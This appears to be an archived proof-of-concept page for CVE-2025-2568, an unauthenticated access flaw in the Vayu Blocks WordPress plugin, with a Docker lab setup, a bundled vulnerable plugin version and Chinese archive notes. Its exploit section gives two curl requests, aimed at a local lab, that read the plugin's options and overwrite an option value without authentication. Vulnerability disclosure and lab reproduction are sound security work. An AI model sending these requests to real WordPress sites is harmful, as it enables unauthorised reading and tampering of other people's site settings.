关联漏洞
描述
Proof of Concept for CVE-2025-2568
介绍
# PoC CVE-2025-2568
### Overview
The **Vayu Blocks – Gutenberg Blocks** for WordPress & WooCommerce plugin for WordPress is vulnerable to **unauthorized access** and **modification** of data due to missing capability checks on the `vayu_blocks_get_toggle_switch_values_callback` and `vayu_blocks_save_toggle_switch_callback` function in versions `1.0.4` to `1.2.1`. This makes it possible for unauthenticated attackers to read plugin options and update any option with a key name ending in `_value`.
### Exploitation Steps
#### Setup (using docker)
1. Clone the repo and follow the steps:
```
cd vuln-wordpress
docker-compose up -d
```
2. Unzip the Vayu-Plugin inside the wp-content/plugins folder.
```
cd wp-content/plugins/
unzip vayu-blocks.1.2.0.zip
```
The Vayu-blocks plugin (version 1.2.0) is now installed.
#### Exploit:
1. Use this to read the options:
```
curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
```
2. Send a POST request like this to modify the option values.
```
curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
-H "Content-Type: application/json" \
-d '{"key":"container", "value":"new_value"}'
```
### Exploit Video
[wordpressexploit.webm](https://github.com/user-attachments/assets/45ac12b1-f6b1-4da3-8afa-eea4960c5212)
文件快照
[4.0K] /data/pocs/66122289fdec62411eb88836af6d1b7387582dcc
├── [1.1K] LICENSE
├── [1.3K] README.md
└── [4.0K] vuln-wordpress
├── [ 571] docker-compose.yml
└── [4.0K] wp-content
└── [4.0K] plugins
└── [2.6M] vayu-blocks.1.2.0.zip
3 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。